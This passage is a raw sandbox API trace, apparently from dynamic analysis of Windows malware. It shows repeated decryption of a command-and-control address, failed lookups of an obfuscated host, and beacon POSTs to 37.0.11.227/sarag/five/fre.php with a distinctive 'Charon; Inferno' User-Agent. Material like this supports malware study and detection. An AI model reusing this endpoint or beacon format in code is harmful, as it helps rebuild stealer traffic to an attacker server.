hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0190.193] GetProcessHeap () returned 0x690000 [0190.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.193] GetProcessHeap () returned 0x690000 [0190.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0190.194] GetProcessHeap () returned 0x690000 [0190.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0190.194] closesocket (s=0x380) returned 0 [0190.195] GetProcessHeap () returned 0x690000 [0190.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0190.195] GetProcessHeap () returned 0x690000 [0190.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0190.196] GetProcessHeap () returned 0x690000 [0190.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0190.196] GetProcessHeap () returned 0x690000 [0190.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0190.197] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xcd4) returned 0x380 [0190.199] Sleep (dwMilliseconds=0xea60) [0190.200] GetProcessHeap () returned 0x690000 [0190.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0190.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0190.224] GetProcessHeap () returned 0x690000 [0190.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0190.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.225] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0190.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.226] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.227] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.227] GetProcessHeap () returned 0x690000 [0190.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0190.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.229] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0190.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.231] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0190.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.245] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0190.245] GetProcessHeap () returned 0x690000 [0190.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.247] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.250] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.251] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.253] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.253] GetProcessHeap () returned 0x690000 [0190.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0190.253] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.253] GetProcessHeap () returned 0x690000 [0190.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0190.254] GetProcessHeap () returned 0x690000 [0190.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0190.254] GetProcessHeap () returned 0x690000 [0190.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.254] GetProcessHeap () returned 0x690000 [0190.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0190.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.263] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0190.272] GetProcessHeap () returned 0x690000 [0190.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0190.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.273] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0190.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.274] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.275] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.275] GetProcessHeap () returned 0x690000 [0190.276] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0190.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.277] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0190.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.278] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0190.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.279] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0190.279] GetProcessHeap () returned 0x690000 [0190.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.293] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0190.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.295] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0190.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.296] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0190.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.297] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0190.297] GetProcessHeap () returned 0x690000 [0190.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0190.297] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9898*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0190.298] GetProcessHeap () returned 0x690000 [0190.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0190.298] socket (af=2, type=1, protocol=6) returned 0x384 [0190.298] connect (s=0x384, name=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0190.324] FreeAddrInfoW (pAddrInfo=0x6a9898*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0190.324] GetProcessHeap () returned 0x690000 [0190.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0190.324] GetProcessHeap () returned 0x690000 [0190.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0190.325] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.326] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.326] GetProcessHeap () returned 0x690000 [0190.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0190.326] GetProcessHeap () returned 0x690000 [0190.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.327] GetProcessHeap () returned 0x690000 [0190.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0190.327] GetProcessHeap () returned 0x690000 [0190.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0190.328] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.329] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.329] GetProcessHeap () returned 0x690000 [0190.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0190.329] GetProcessHeap () returned 0x690000 [0190.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.330] send (s=0x384, buf=0x6abd08*, len=242, flags=0) returned 242 [0190.330] send (s=0x384, buf=0x6aba40*, len=159, flags=0) returned 159 [0190.330] GetProcessHeap () returned 0x690000 [0190.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0190.330] recv (in: s=0x384, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0190.405] GetProcessHeap () returned 0x690000 [0190.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0190.406] GetProcessHeap () returned 0x690000 [0190.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0190.406] GetProcessHeap () returned 0x690000 [0190.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0190.407] GetProcessHeap () returned 0x690000 [0190.407] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0190.407] closesocket (s=0x384) returned 0 [0190.408] GetProcessHeap () returned 0x690000 [0190.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0190.408] GetProcessHeap () returned 0x690000 [0190.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0190.408] GetProcessHeap () returned 0x690000 [0190.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.408] GetProcessHeap () returned 0x690000 [0190.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0190.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x428) returned 0x384 [0190.411] Sleep (dwMilliseconds=0xea60) [0190.412] GetProcessHeap () returned 0x690000 [0190.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0190.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.414] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0190.438] GetProcessHeap () returned 0x690000 [0190.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0190.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.439] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0190.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.441] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.442] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.442] GetProcessHeap () returned 0x690000 [0190.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0190.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.446] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0190.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.454] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0190.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.455] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0190.455] GetProcessHeap () returned 0x690000 [0190.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.457] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.457] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.458] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.459] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.459] GetProcessHeap () returned 0x690000 [0190.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0190.459] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.460] GetProcessHeap () returned 0x690000 [0190.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0190.460] GetProcessHeap () returned 0x690000 [0190.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0190.461] GetProcessHeap () returned 0x690000 [0190.461] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0190.461] GetProcessHeap () returned 0x690000 [0190.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0190.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0190.479] GetProcessHeap () returned 0x690000 [0190.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0190.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.480] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0190.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.481] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.482] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.482] GetProcessHeap () returned 0x690000 [0190.482] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0190.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.483] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0190.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.484] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0190.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0190.486] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0190.488] GetProcessHeap () returned 0x690000 [0190.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0190.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.488] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0190.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.489] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0190.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.490] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0190.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0190.491] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0190.491] GetProcessHeap () returned 0x690000 [0190.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0190.491] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a97f8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0190.491] GetProcessHeap () returned 0x690000 [0190.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0190.491] socket (af=2, type=1, protocol=6) returned 0x388 [0190.492] connect (s=0x388, name=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0190.516] FreeAddrInfoW (pAddrInfo=0x6a97f8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0190.516] GetProcessHeap () returned 0x690000 [0190.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0190.516] GetProcessHeap () returned 0x690000 [0190.516] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0190.517] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.518] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.518] GetProcessHeap () returned 0x690000 [0190.518] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0190.518] GetProcessHeap () returned 0x690000 [0190.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.518] GetProcessHeap () returned 0x690000 [0190.518] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0190.518] GetProcessHeap () returned 0x690000 [0190.518] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0190.520] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0190.523] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.523] GetProcessHeap () returned 0x690000 [0190.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0190.523] GetProcessHeap () returned 0x690000 [0190.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0190.524] send (s=0x388, buf=0x6abd08*, len=242, flags=0) returned 242 [0190.524] send (s=0x388, buf=0x6aba40*, len=159, flags=0) returned 159 [0190.524] GetProcessHeap () returned 0x690000 [0190.524] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0190.524] recv (in: s=0x388, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0190.599] GetProcessHeap () returned 0x690000 [0190.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0190.599] GetProcessHeap () returned 0x690000 [0190.600] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0190.600] GetProcessHeap () returned 0x690000 [0190.600] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0190.600] GetProcessHeap () returned 0x690000 [0190.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0190.601] closesocket (s=0x388) returned 0 [0190.601] GetProcessHeap () returned 0x690000 [0190.601] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0190.602] GetProcessHeap () returned 0x690000 [0190.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0190.602] GetProcessHeap () returned 0x690000 [0190.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0190.602] GetProcessHeap () returned 0x690000 [0190.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0190.603] CreateThread (in: 